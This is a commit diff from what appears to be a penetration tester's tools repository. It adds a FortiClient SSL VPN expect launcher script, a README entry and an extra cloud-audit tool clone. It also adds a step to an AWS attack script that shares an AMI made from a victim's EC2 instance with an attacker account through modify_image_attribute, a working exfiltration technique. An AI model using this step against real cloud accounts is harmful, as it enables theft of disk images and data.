Added forticlientsslvpn-expect.sh
This commit is contained in:
parent
e10c59cfef
commit
f552d315df
|
@ -21,6 +21,7 @@
|
||||||
# CreateImage:
|
# CreateImage:
|
||||||
# Abuses:
|
# Abuses:
|
||||||
# ec2:CreateImage
|
# ec2:CreateImage
|
||||||
|
# ec2:ModifyImageAttribute
|
||||||
#
|
#
|
||||||
# NOT FULLY IMPLEMENTED YET.
|
# NOT FULLY IMPLEMENTED YET.
|
||||||
# For this technique, the procedure is following - the script will create an image out of specified victim's EC2
|
# For this technique, the procedure is following - the script will create an image out of specified victim's EC2
|
||||||
|
@ -351,13 +352,28 @@ To examine exfiltrated data:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
|
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
|
||||||
|
|
||||||
# Step 2: Import custom SSH RSA public key
|
target_user = self.get_account_id('attacker')
|
||||||
|
Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}")
|
||||||
|
try:
|
||||||
|
modify_result = victim_client.modify_image_attribute(
|
||||||
|
Attribute = 'launchPermission',
|
||||||
|
ImageId = created_image['ImageId'],
|
||||||
|
OperationType = 'add',
|
||||||
|
UserIds = [
|
||||||
|
target_user,
|
||||||
|
]
|
||||||
|
)
|
||||||
|
Logger.ok(f"Image's attributes modified to share it with user {target_user}")
|
||||||
|
except Exception as e:
|
||||||
|
Logger.fatal(f"ec2:ModifyImageAttribute action on Victim failed. Exception: {e}")
|
||||||
|
|
||||||
|
# Step 3: Import custom SSH RSA public key
|
||||||
# client.import_key_pair(
|
# client.import_key_pair(
|
||||||
# KeyName = "Some key name"
|
# KeyName = "Some key name"
|
||||||
# PublicKeyMaterial = "key material"
|
# PublicKeyMaterial = "key material"
|
||||||
# )
|
# )
|
||||||
|
|
||||||
# Step 3: Create an instance from exported AMI
|
# Step 4: Create an instance from exported AMI
|
||||||
# client.run_instances(
|
# client.run_instances(
|
||||||
# ImageId = "ami-00000000",
|
# ImageId = "ami-00000000",
|
||||||
# SecurityGroupIds = ["sg-00000", ],
|
# SecurityGroupIds = ["sg-00000", ],
|
||||||
|
@ -370,7 +386,7 @@ To examine exfiltrated data:
|
||||||
# Returns:
|
# Returns:
|
||||||
# "i-00001111002222"
|
# "i-00001111002222"
|
||||||
|
|
||||||
# Step 4: Connect to that EC2 instance
|
# Step 5: Connect to that EC2 instance
|
||||||
# client.describe_instances(
|
# client.describe_instances(
|
||||||
# InstanceIds = ["i-00001111002222"],
|
# InstanceIds = ["i-00001111002222"],
|
||||||
# Query = "Reservations[0].Instances[0].PublicIpAddress"
|
# Query = "Reservations[0].Instances[0].PublicIpAddress"
|
||||||
|
|
|
@ -121,6 +121,7 @@ cd aws
|
||||||
git_clone https://github.com/RhinoSecurityLabs/pacu.git ; cd pacu ; bash install.sh ; cd ..
|
git_clone https://github.com/RhinoSecurityLabs/pacu.git ; cd pacu ; bash install.sh ; cd ..
|
||||||
git_clone https://github.com/Alfresco/prowler.git
|
git_clone https://github.com/Alfresco/prowler.git
|
||||||
git_clone https://github.com/sa7mon/S3Scanner.git
|
git_clone https://github.com/sa7mon/S3Scanner.git
|
||||||
|
git_clone https://github.com/percolate/ec2-security-groups-dumper.git
|
||||||
git_clone https://github.com/ankane/s3tk.git
|
git_clone https://github.com/ankane/s3tk.git
|
||||||
git_clone https://github.com/andresriancho/enumerate-iam
|
git_clone https://github.com/andresriancho/enumerate-iam
|
||||||
git_clone https://github.com/arkadiyt/aws_public_ips.git
|
git_clone https://github.com/arkadiyt/aws_public_ips.git
|
||||||
|
|
|
@ -7,6 +7,8 @@
|
||||||
|
|
||||||
- **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
|
- **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
|
||||||
|
|
||||||
|
- **`forticlientsslvpn-expect.sh`** - Forticlient SSL VPN Client launching script utilizing expect. Useful while working for clients exposing their local networks through a Fortinet SSL VPN. [gist](https://gist.githubusercontent.com/mgeeky/8afc0e32b8b97fd6f96fce6098615a93/raw/cf127be09d02e04c00eb578e4ef1219a773d21cf/forticlientsslvpn-expect.sh)
|
||||||
|
|
||||||
- **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
|
- **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
|
||||||
|
|
||||||
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
||||||
|
|
|
@ -0,0 +1,63 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Forticlient SSL VPN Client launching script utilizing expect.
|
||||||
|
|
||||||
|
# --------------------------------------------
|
||||||
|
# CONFIGURATION
|
||||||
|
|
||||||
|
# If empty - script will take some simple logic to locate appropriate binary.
|
||||||
|
FORTICLIENT_PATH=""
|
||||||
|
|
||||||
|
# VPN Credentials
|
||||||
|
VPN_HOST="host:10443"
|
||||||
|
VPN_USER="username"
|
||||||
|
VPN_PASS="password"
|
||||||
|
|
||||||
|
# --------------------------------------------
|
||||||
|
|
||||||
|
trap ctrl_c INT
|
||||||
|
|
||||||
|
function ctrl_c() {
|
||||||
|
echo "Removing left-over files..."
|
||||||
|
rm -f /tmp/expect
|
||||||
|
}
|
||||||
|
|
||||||
|
if [[ $EUID -ne 0 ]]; then
|
||||||
|
echo "This script must be run as root"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -z "$FORTICLIENT_PATH" ]; then
|
||||||
|
FORTICLIENT_PATH=`uname -r | grep -q 64 && echo $(locate forticlientsslvpn_cli | grep 64bit) || echo $(locate forticlientsslvpn_cli | grep 32bit)`
|
||||||
|
if [ ! -f $FORTICLIENT_PATH ]; then
|
||||||
|
echo "Tried to locate Forticlient SSL VPN Cli binary, but failed."
|
||||||
|
echo "Specify it at variable FORTCLIENT_PATH"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
echo "Located Forticlient VPN Client at: $FORTICLIENT_PATH"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "Killing previous instances of Forticlient SSL VPN client..."
|
||||||
|
killall -9 $(basename $FORTICLIENT_PATH) 2> /dev/null
|
||||||
|
|
||||||
|
cat << EOF > /tmp/expect
|
||||||
|
#!/usr/bin/expect -f
|
||||||
|
match_max 1000000
|
||||||
|
set timeout -1
|
||||||
|
spawn $FORTICLIENT_PATH --server $VPN_HOST --vpnuser $VPN_USER --keepalive
|
||||||
|
expect "Password for VPN:"
|
||||||
|
send -- "$VPN_PASS"
|
||||||
|
send -- "\r"
|
||||||
|
|
||||||
|
expect "Would you like to connect to this server? (Y/N)"
|
||||||
|
send -- "Y"
|
||||||
|
send -- "\r"
|
||||||
|
|
||||||
|
expect "Clean up..."
|
||||||
|
close
|
||||||
|
EOF
|
||||||
|
|
||||||
|
chmod 500 /tmp/expect
|
||||||
|
/usr/bin/expect -f /tmp/expect
|
||||||
|
|
||||||
|
rm -f /tmp/expect
|
Loading…
Reference in New Issue